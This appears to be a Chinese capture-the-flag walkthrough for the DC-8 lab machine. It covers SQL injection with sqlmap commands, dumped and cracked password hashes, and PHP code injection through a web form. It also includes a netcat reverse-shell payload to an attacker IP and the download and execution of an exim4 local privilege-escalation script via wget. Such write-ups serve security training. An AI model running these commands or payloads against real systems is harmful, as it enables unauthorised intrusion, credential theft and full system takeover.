DC_8
信息搜集
存活检测
详细扫描
后台网页扫描
网站信息搜集
访问不同的页面的时候 url 随之变化
尝试 sql 注入
在 url 后输入 '
验证
直接报数据库语法错误
漏洞利用
-
使用 sqlmap 工具
-
爆破数据库
sqlmap -u 10.4.7.153/?nid=2 --dbs --batch
-
成功爆破出两个数据库
d7db 和 information_schema
-
爆破数据库 d7db
sqlmap -u 10.4.7.153/?nid=2 -D d7db -tables --batch
爆破出 users 表
-
爆破表中字段
sqlmap -u 10.4.7.153/?nid=2 -D d7db -T users --dump
爆破 admin 和 john 用户的密码
$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
-
写入 passwd 文件,使用 john 爆破
爆破出一个密码
turtle
shell 获取
网页登录
-
尝试 ssh、web 各种登录
-
最终发现可以使用 john turtle 登录 扫描出来的 /user/login 界面
-
网页信息搜集,最终在以下位置寻找到突破点
漏洞发现
-
此处可以输出 php 代码
-
尝试 phpinfo() 验证
回到 view 页面,随便填写信息,点击提交
-
未返回信息
-
在 php 语句前随便加上一行
-
成功执行
反弹 shell
-
kali 开启 nc 监听
-
输入 php 连接命令
<?php system("nc -e /bin/bash 10.4.7.146 7777");?>
-
保存并提交
成功反弹
提权
-
查看 suid 权限
exim4
是 Linux 系统中的一个可执行文件,它是 Exim 邮件传输代理(MTA)的主要可执行文件。Exim 是一种广泛使用的邮件服务器软件,用于在 Linux 和类 Unix 系统上传输电子邮件。 -
查看版本
-
搜索漏洞
searchsploit exim
选择适合版本的本地提权脚本
-
下载提权脚本
-
将脚本转换为 uninx 格式
apt install dos2unix dos2unix 46996.sh
-
查看脚本使用方法
无需修改
-
kali 开启 http 服务将提脚本上传至靶机
python3 -m http.server 80
-
靶机下载提权脚本
wget http://10.4.7.146/46996.sh
-
使用方法
-
赋权,运行
chmod 777 46996.sh ./46996.sh -m netcat
-
提权成功
总结
- sql 注入
- 反弹 shell
- 利用漏洞脚本时注意脚本对应的系统